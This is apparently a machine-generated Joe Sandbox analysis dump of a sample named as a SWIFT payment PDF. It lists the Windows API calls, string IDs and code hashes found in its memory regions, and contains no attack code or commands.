                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume
                                                        • String ID: HH
                                                        • API String ID: 2507767853-2761332787
                                                        • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                        • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                        • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                        • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                        • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                        • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                        • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                        APIs
                                                          • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                        • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                        • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                        • String ID: HH
                                                        • API String ID: 1515696956-2761332787
                                                        • Opcode ID: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                        • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                        • Opcode Fuzzy Hash: 536d88bcd2219f00ee4950b39be395ae06382d48515621a82e1548501abb3963
                                                        • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                        APIs
                                                          • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                        • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                        • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                        • CoUninitialize.OLE32 ref: 0046CE50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                        • Instruction ID: 634f95a1702cd93f148e07eb64efb4b351689d97c5b229aafe37579347e0b37e
                                                        • Opcode Fuzzy Hash: 8095c6d59d69238af541582e7c79e2891b33013a97e816c4c493b562f1f8ea66
                                                        • Instruction Fuzzy Hash: E821AF312083009FC700EF55C985F5ABBF4EF89724F148A6EF9549B2E2D7B5A805CB56
                                                        APIs
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                        • GetMenuItemInfoW.USER32 ref: 004497EA
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                        • DrawMenuBar.USER32 ref: 00449828
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Menu$InfoItem$Draw_malloc
                                                        • String ID: 0
                                                        • API String ID: 772068139-4108050209
                                                        • Opcode ID: b5cbb9c1b06665bd69f14325ec352e81c7d44794461e0723aff188c22e10657c
                                                        • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                        • Opcode Fuzzy Hash: b5cbb9c1b06665bd69f14325ec352e81c7d44794461e0723aff188c22e10657c
                                                        • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AllocTask_wcslen
                                                        • String ID: hkG
                                                        • API String ID: 2651040394-3610518997
                                                        • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                        • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                        • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                        • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                        • API String ID: 2574300362-1816364905
                                                        • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                        • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                        • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                        • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: ICMP.DLL$IcmpSendEcho
                                                        • API String ID: 2574300362-58917771
                                                        • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                        • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                        • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                        • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                                        • API String ID: 2574300362-3530519716
                                                        • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                        • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                        • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                        • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: ICMP.DLL$IcmpCreateFile
                                                        • API String ID: 2574300362-275556492
                                                        • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                        • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                        • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                        • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: IsWow64Process$kernel32.dll
                                                        • API String ID: 2574300362-3024904723
                                                        • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                        • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                        • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                        • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,0040E5BF,?), ref: 0040EEEB
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                        • Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
                                                        • Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                        • Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: a4ea8397b34014ee7dc62a339745ba3a4c2065d5cd2c73fc93ebbc615713f85a
                                                        • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                        • Opcode Fuzzy Hash: a4ea8397b34014ee7dc62a339745ba3a4c2065d5cd2c73fc93ebbc615713f85a
                                                        • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                        APIs
                                                        • __flush.LIBCMT ref: 00414630
                                                        • __fileno.LIBCMT ref: 00414650
                                                        • __locking.LIBCMT ref: 00414657
                                                        • __flsbuf.LIBCMT ref: 00414682
                                                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                        • String ID:
                                                        • API String ID: 3240763771-0
                                                        • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                        • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                        • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                        • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                        • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                        • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CopyVariant$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2286883814-0
                                                        • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                        • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                        • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                        • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                        • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                        • #21.WSOCK32 ref: 004740E0
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$socket
                                                        • String ID:
                                                        • API String ID: 1881357543-0
                                                        • Opcode ID: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                        • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                        • Opcode Fuzzy Hash: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                        • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                        APIs
                                                        • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                        • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                        • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                        • MessageBeep.USER32(00000000), ref: 00441DF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                        • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                        • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                        • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                        • __isleadbyte_l.LIBCMT ref: 004238B2
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
